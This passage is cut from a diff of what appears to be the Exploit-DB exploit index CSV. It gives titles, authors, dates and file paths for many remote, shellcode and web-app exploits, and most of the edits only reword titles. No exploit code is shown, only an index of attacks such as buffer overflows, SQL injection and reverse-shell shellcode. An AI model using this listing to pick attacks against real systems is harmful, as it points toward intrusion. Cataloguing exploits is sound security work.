Guninsky",windows,remote,0 -19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0 +19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 / Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0 19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure (Metasploit)",2012-06-13,Metasploit,hardware,remote,0 19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0 19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0 @@ -11866,7 +11868,7 @@ id,file,description,date,author,platform,type,port 19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4) (Metasploit)",2012-06-15,Metasploit,windows,remote,0 19186,platforms/windows/remote/19186.rb,"Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (MS12-043) (Metasploit)",2012-06-16,Metasploit,windows,remote,0 19193,platforms/multiple/remote/19193.txt,"Allaire Forums 2.0.4 - Getfile",1999-02-11,"Cameron Childress",multiple,remote,0 -19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP And FSO To Read Server Files",1999-02-11,"Gary Geisbert",multiple,remote,0 +19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files",1999-02-11,"Gary Geisbert",multiple,remote,0 19197,platforms/windows/remote/19197.txt,"Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client",1997-04-08,"Paul Ashton",windows,remote,0 19208,platforms/windows/remote/19208.txt,"Microsoft Site Server Commerce Edition 3.0 alpha - AdSamples Sensitive Information",1999-05-11,"Andrey Kruchkov",windows,remote,0 19218,platforms/linux/remote/19218.c,"Cat Soft Serv-U FTP Server 2.5 - Buffer Overflow",1999-05-03,"Arne Vidstrom",linux,remote,0 @@ -11885,7 +11887,7 @@ id,file,description,date,author,platform,type,port 19246,platforms/windows/remote/19246.pm,"Microsoft IIS 4.0 - Buffer Overflow (2)",1999-06-15,Stinko,windows,remote,0 19247,platforms/linux/remote/19247.c,"Microsoft IIS 4.0 - Buffer Overflow (3)",1999-06-15,"eeye security",linux,remote,0 19248,platforms/windows/remote/19248.c,"Microsoft IIS 4.0 - Buffer Overflow (4)",1999-06-15,"Greg Hoglund",windows,remote,0 -19251,platforms/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four and Zero Header Length",1999-06-16,badi,linux,remote,0 +19251,platforms/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four / Zero Header Length",1999-06-16,badi,linux,remote,0 19253,platforms/linux/remote/19253.txt,"Debian 2.1 - httpd Exploit",1999-06-17,anonymous,linux,remote,0 19266,platforms/windows/remote/19266.py,"EZHomeTech Ezserver 6.4 - Stack Overflow",2012-06-18,modpr0be,windows,remote,0 19288,platforms/windows/remote/19288.py,"HP Data Protector Client - EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",windows,remote,0 @@ -11900,7 +11902,7 @@ id,file,description,date,author,platform,type,port 19322,platforms/windows/remote/19322.rb,"Apple iTunes 10.6.1.7 - Extended m3u Stack Buffer Overflow (Metasploit)",2012-06-21,Rh0,windows,remote,0 19327,platforms/solaris/remote/19327.c,"Sun Solaris 2.5.1 - rpc.statd rpc Call Relaying",1999-06-07,anonymous,solaris,remote,0 19348,platforms/aix/remote/19348.txt,"IBM AIX 3.2.5 - login(1) Exploit",1996-12-04,anonymous,aix,remote,0 -19407,platforms/windows/remote/19407.py,"Symantec pcAnywhere 12.5.0 - Login and Password Field Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0 +19407,platforms/windows/remote/19407.py,"Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0 19361,platforms/windows/remote/19361.txt,"Microsoft IIS 3.0/4.0 - Double Byte Code Page",1999-06-24,Microsoft,windows,remote,0 19363,platforms/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 - Fasttrack Root Directory Listing",1999-06-07,"Jesús López de Aguileta",multiple,remote,0 19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 - SP5B NDS Default Rights",1999-04-09,"Simple Nomad",netware,remote,0 @@ -11947,7 +11949,7 @@ id,file,description,date,author,platform,type,port 19532,platforms/aix/remote/19532.pl,"IBM AIX 4.3.2 ftpd - Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote,0 19537,platforms/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal",1999-10-02,"rain forest puppy",windows,remote,0 19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],hardware,remote,0 -19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - IFRAME Exploit",1999-10-11,"Georgi Guninski",windows,remote,0 +19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - iFrame Exploit",1999-10-11,"Georgi Guninski",windows,remote,0 19540,platforms/windows/remote/19540.txt,"t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",windows,remote,0 19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog Exploit",1997-10-19,"Bryan Berg",php,remote,0 19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 Exploit (1)",1998-03-16,Rootshell,hardware,remote,0 @@ -12097,7 +12099,7 @@ id,file,description,date,author,platform,type,port 19917,platforms/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (2)",2000-05-16,L0pht,multiple,remote,0 19918,platforms/multiple/remote/19918.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (3)",2000-05-16,L0pht,multiple,remote,0 19921,platforms/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 - Arbitrary Command Execution",2000-05-16,suid,cgi,remote,0 -19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default 'Username' and Password",2000-05-17,"rain forest puppy",windows,remote,0 +19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password",2000-05-17,"rain forest puppy",windows,remote,0 19924,platforms/bsd/remote/19924.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (1)",2000-05-16,duke,bsd,remote,0 19926,platforms/linux/remote/19926.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (3)",2000-04-08,"Jim Paris",linux,remote,0 19928,platforms/windows/remote/19928.txt,"Microsoft Active Movie Control 1.0 - Filetype",2000-05-13,http-equiv,windows,remote,0 @@ -12354,7 +12356,7 @@ id,file,description,date,author,platform,type,port 20516,platforms/multiple/remote/20516.txt,"BEA Systems WebLogic Server 4.0 x/4.5 x/5.1 x - Double Dot Buffer Overflow",2000-12-19,peter.grundl,multiple,remote,0 20519,platforms/multiple/remote/20519.c,"Check Point Software Firewall-1 4.1 SP2 - Fast Mode TCP Fragment",2000-12-14,"Thomas Lopatic",multiple,remote,0 20522,platforms/cgi/remote/20522.txt,"Technote 2000/2001 - 'board' File Disclosure",2000-12-23,bt,cgi,remote,0 -20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Parameter Command Execution And File Disclosure",2000-12-27,Ksecurity,cgi,remote,0 +20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Parameter Command Execution and File Disclosure",2000-12-27,Ksecurity,cgi,remote,0 20524,platforms/cgi/remote/20524.txt,"Brian Stanback bsguest.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0 20525,platforms/cgi/remote/20525.txt,"Brian Stanback bslist.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0 20527,platforms/cgi/remote/20527.txt,"Informix Webdriver 1.0 - Remote Administration Access",2000-12-30,isno,cgi,remote,0 @@ -12472,7 +12474,7 @@ id,file,description,date,author,platform,type,port 20782,platforms/windows/remote/20782.eml,"Microsoft Internet Explorer 5.0/5.5 / OE 5.5 - XML Stylesheets Active Scripting",2001-04-20,"Georgi Guninski",windows,remote,0 20791,platforms/unix/remote/20791.php,"Netscape Navigator 4.0.8 - 'about:' Domain Information Disclosure",2001-04-09,"Florian Wesch",unix,remote,0 20793,platforms/windows/remote/20793.txt,"RobTex Viking Server 1.0.7 - Relative Path Webroot Escaping",2001-04-23,joetesta,windows,remote,0 -20794,platforms/windows/remote/20794.c,"WFTPD 3.0 - 'RETR' and 'CWD' Buffer Overflow",2001-04-22,"Len Budney",windows,remote,0 +20794,platforms/windows/remote/20794.c,"WFTPD 3.0 - 'RETR' / 'CWD' Buffer Overflow",2001-04-22,"Len Budney",windows,remote,0 20796,platforms/linux/remote/20796.rb,"Zabbix Server - Arbitrary Command Execution (Metasploit)",2012-08-27,Metasploit,linux,remote,0 20797,platforms/multiple/remote/20797.txt,"Perl Web Server 0.x - Directory Traversal",2001-04-24,neme-dhc,multiple,remote,0 20799,platforms/cgi/remote/20799.c,"PowerScripts PlusMail WebConsole 1.0 - Poor Authentication (1)",2000-01-11,"Synnergy Networks",cgi,remote,0 @@ -12606,7 +12608,7 @@ id,file,description,date,author,platform,type,port 21102,platforms/cgi/remote/21102.txt,"Power Up HTML 0.8033 Beta - Directory Traversal Arbitrary File Disclosure",2001-09-07,"Steve Shepherd",cgi,remote,0 21104,platforms/cgi/remote/21104.pl,"Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution",2001-09-08,"Alexey Sintsov",cgi,remote,0 21109,platforms/windows/remote/21109.c,"EFTP 2.0.7 337 - Buffer Overflow Code Execution / Denial of Service",2001-09-12,byterage,windows,remote,0 -21110,platforms/windows/remote/21110.pl,"EFTP Server 2.0.7.337 - Directory and File Existence",2001-09-12,byterage,windows,remote,0 +21110,platforms/windows/remote/21110.pl,"EFTP Server 2.0.7.337 - Directory Existence / File Existence",2001-09-12,byterage,windows,remote,0 21112,platforms/linux/remote/21112.php,"RedHat Linux 7.0 Apache - Remote 'Username' Enumeration",2001-09-12,"Gabriel A Maggiotti",linux,remote,0 21113,platforms/windows/remote/21113.txt,"Microsoft Index Server 2.0 - File Information / Full Path Disclosure",2001-09-14,"Syed Mohamed",windows,remote,0 21115,platforms/multiple/remote/21115.pl,"AmTote Homebet - World Accessible Log",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0 @@ -13266,7 +13268,7 @@ id,file,description,date,author,platform,type,port 23243,platforms/windows/remote/23243.py,"Freefloat FTP Server - 'USER' Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0 23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 - Messenger Service Buffer Overrun (MS03-043)",2003-10-25,Adik,windows,remote,0 23404,platforms/multiple/remote/23404.c,"Applied Watch Command Center 1.0 - Authentication Bypass (1)",2003-11-28,"Bugtraq Security",multiple,remote,0 -23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts And Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote,0 +23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts and Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote,0 23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation",2003-10-20,"Marc Schoenefeld",windows,remote,0 23270,platforms/windows/remote/23270.java,"Sun Java Plugin 1.4 - Unauthorized Java Applet Floppy Access",2003-10-21,"Marc Schoenefeld",windows,remote,0 23271,platforms/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin - Cross-Site Scripting",2003-10-22,SecuriTeam,multiple,remote,0 @@ -13387,7 +13389,7 @@ id,file,description,date,author,platform,type,port 23603,platforms/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal",2004-01-26,"Donato Ferrante",windows,remote,0 23604,platforms/linux/remote/23604.txt,"Antologic Antolinux 1.0 - Administrative Interface NDCR Parameter Remote Command Execution",2004-01-26,"Himeur Nourredine",linux,remote,0 23605,platforms/solaris/remote/23605.txt,"Cherokee 0.1.x/0.2.x/0.4.x - Error Page Cross-Site Scripting",2004-01-26,"César Fernández",solaris,remote,0 -23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack and Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0 +23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack / Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0 23612,platforms/windows/remote/23612.txt,"BRS Webweaver 1.0.7 - 'ISAPISkeleton.dll' Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote,0 23632,platforms/windows/remote/23632.txt,"Crob FTP Server 3.5.1 - Remote Information Disclosure",2004-02-02,"Zero X",windows,remote,0 23643,platforms/windows/remote/23643.txt,"Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy (MS04-004)",2004-02-03,"Andreas Sandblad",windows,remote,0 @@ -13402,7 +13404,7 @@ id,file,description,date,author,platform,type,port 23679,platforms/windows/remote/23679.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (2)",2004-02-10,"Cheng Peng Su",windows,remote,0 23707,platforms/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",multiple,remote,0 23714,platforms/windows/remote/23714.c,"KarjaSoft Sami HTTP Server 1.0.4 - GET Buffer Overflow",2004-02-13,badpack3t,windows,remote,0 -23717,platforms/windows/remote/23717.txt,"Microsoft Windows XP - Help And Support Center Interface Spoofing",2004-02-17,"Bartosz Kwitkowski",windows,remote,0 +23717,platforms/windows/remote/23717.txt,"Microsoft Windows XP - Help and Support Center Interface Spoofing",2004-02-17,"Bartosz Kwitkowski",windows,remote,0 23721,platforms/hardware/remote/23721.txt,"Linksys WAP55AG 1.0.7 - SNMP Community String Insecure Configuration",2004-02-18,"NN Poster",hardware,remote,0 23728,platforms/linux/remote/23728.txt,"Metamail 2.7 - Multiple Buffer Overflow/Format String Handling Vulnerabilities",2004-02-18,"Ulf Harnhammar",linux,remote,0 23730,platforms/windows/remote/23730.txt,"AOL Instant Messenger 4.x/5.x - Buddy Icon Predictable File Location",2004-02-19,"Michael Evanchik",windows,remote,0 @@ -13588,7 +13590,7 @@ id,file,description,date,author,platform,type,port 24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)",2013-02-14,"Scott Bell",windows,remote,0 24502,platforms/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow (Metasploit)",2013-02-14,Metasploit,windows,remote,0 24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 - Download Execute",2013-02-20,g11tch,windows,remote,0 -24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow (Metasploit)",2013-02-20,Metasploit,windows,remote,0 +24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH / DUPF Buffer Overflow (Metasploit)",2013-02-20,Metasploit,windows,remote,0 24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload (Metasploit)",2013-02-20,Metasploit,windows,remote,0 24529,platforms/php/remote/24529.rb,"OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)",2013-02-20,Metasploit,php,remote,0 24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)",2013-02-23,Metasploit,windows,remote,0 @@ -13815,7 +13817,7 @@ id,file,description,date,author,platform,type,port 25608,platforms/hardware/remote/25608.rb,"Linksys WRT160N v2 - apply.cgi Remote Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80 25609,platforms/hardware/remote/25609.rb,"D-Link DIR-615H - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80 25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0 -25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0 +25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence / File Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0 25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g - Database Fine Grained Audit Logging Failure",2005-05-05,"Alexander Kornbrust",multiple,remote,0 25621,platforms/windows/remote/25621.txt,"software602 602 lan suite 2004 - Directory Traversal",2005-05-05,dr_insane,windows,remote,0 25624,platforms/unix/remote/25624.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (1)",2005-05-06,"Luca Ercoli",unix,remote,0 @@ -14403,7 +14405,7 @@ id,file,description,date,author,platform,type,port 31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Parameter Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote,0 31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0 31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0 -31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0 +31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection / HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0 31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe_mode' Security Bypass Exploit",2008-01-23,"Maksymilian Arciemowicz",php,remote,0 31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0 40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111 @@ -14513,7 +14515,7 @@ id,file,description,date,author,platform,type,port 31912,platforms/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",multiple,remote,0 31918,platforms/multiple/remote/31918.txt,"Crysis 1.21 - 'keyexchange' Packet Information Disclosure",2008-06-15,"Luigi Auriemma",multiple,remote,0 31920,platforms/multiple/remote/31920.txt,"Glub Tech Secure FTP 2.5.15 - 'LIST' Command Directory Traversal",2008-06-13,"Tan Chew Keong",multiple,remote,0 -31921,platforms/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' and 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",multiple,remote,0 +31921,platforms/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",multiple,remote,0 31922,platforms/multiple/remote/31922.txt,"GlassFish Application Server - 'resourceNode/customResourceNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0 31923,platforms/multiple/remote/31923.txt,"GlassFish Application Server - 'resourceNode/externalResourceNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0 31924,platforms/multiple/remote/31924.txt,"GlassFish Application Server - 'resourceNode/jmsDestinationNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0 @@ -15016,7 +15018,7 @@ id,file,description,date,author,platform,type,port 35005,platforms/windows/remote/35005.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote,0 35006,platforms/windows/remote/35006.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0 35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0 -35011,platforms/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' and 'orderBy' Parameters Cross-Site Scripting",2010-11-22,"Adam Muntner",linux,remote,0 +35011,platforms/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting",2010-11-22,"Adam Muntner",linux,remote,0 35014,platforms/hardware/remote/35014.txt,"D-Link DIR-300 - WiFi Key Security Bypass",2010-11-24,"Gaurav Saha",hardware,remote,0 35018,platforms/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - 'tcp_test' Length Parameter Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote,0 35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService - Arbitrary File Upload (Metasploit)",2014-10-21,Metasploit,windows,remote,0 @@ -15733,7 +15735,7 @@ id,file,description,date,author,platform,type,port 41358,platforms/php/remote/41358.rb,"Piwik 2.14.0/2.16.0/2.17.1/3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80 41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0 41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0 -41443,platforms/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0 +41443,platforms/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0 41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0 41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0 41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0 @@ -15768,7 +15770,7 @@ id,file,description,date,author,platform,type,port 41720,platforms/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote,0 41738,platforms/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0 41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0 -41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443 +41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret and Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443 41751,platforms/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,windows,remote,0 41775,platforms/windows/remote/41775.py,"Sync Breeze Enterprise 9.5.16 - 'GET' Buffer Overflow (SEH)",2017-03-29,"Daniel Teixeira",windows,remote,0 41808,platforms/hardware/remote/41808.txt,"Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow",2017-04-04,"Google Security Research",hardware,remote,0 @@ -15898,6 +15900,7 @@ id,file,description,date,author,platform,type,port 42958,platforms/linux/remote/42958.py,"Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution",2017-08-08,"Jared Arave",linux,remote,0 42964,platforms/lin_x86-64/remote/42964.rb,"Rancher Server - Docker Daemon Code Execution (Metasploit)",2017-10-09,Metasploit,lin_x86-64,remote,8080 42965,platforms/multiple/remote/42965.rb,"OrientDB 2.2.2 < 2.2.22 - Remote Code Execution (Metasploit)",2017-10-09,Metasploit,multiple,remote,2480 +42973,platforms/windows/remote/42973.py,"VX Search Enterprise 10.1.12 - Buffer Overflow",2017-10-09,"Revnic Vasile",windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -17896,7 +17899,7 @@ id,file,description,date,author,platform,type,port 3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - 'user.php id' Parameter SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - Code Execution / SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps,0 -3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0 +3089,platforms/asp/webapps/3089.txt,"Quote&Ordering System 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0 3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Inclusion",2007-01-06,"Mehmet Ince",php,webapps,0 3091,platforms/php/webapps/3091.php,"L2J Statistik Script 0.09 - 'index.php' Local File Inclusion",2007-01-07,Codebreak,php,webapps,0 3093,platforms/php/webapps/3093.txt,"AllMyGuests 0.3.0 - 'AMG_serverpath' Parameter Remote File Inclusion",2007-01-07,beks,php,webapps,0 @@ -18750,7 +18753,7 @@ id,file,description,date,author,platform,type,port 4518,platforms/php/webapps/4518.txt,"WebDesktop 0.1 - Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0 4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 - 'client.php' Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0 4520,platforms/php/webapps/4520.txt,"PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion",2007-10-11,0in,php,webapps,0 -4521,platforms/php/webapps/4521.txt,"Joomla! Component Flash uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0 +4521,platforms/php/webapps/4521.txt,"Joomla! Component Flash Uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0 4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Module Newsletter - SQL Injection",2007-10-11,s4mi,php,webapps,0 4524,platforms/php/webapps/4524.txt,"Joomla! Component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps,0 4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 - 'tiki-graph_formula.php' Command Execution",2007-10-12,str0ke,php,webapps,0 @@ -20985,7 +20988,7 @@ id,file,description,date,author,platform,type,port 7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' Parameter SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps,0 7441,platforms/php/webapps/7441.txt,"Joomla! Component live chat - SQL Injection / Open Proxy",2008-12-12,jdc,php,webapps,0 -7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0 +7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 / PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0 7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,php,webapps,0 7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0 7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0 @@ -21023,7 +21026,7 @@ id,file,description,date,author,platform,type,port 7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - SQL Injection",2008-12-15,ZoRLu,php,webapps,0 7484,platforms/asp/webapps/7484.txt,"Click&BaneX - Multiple SQL 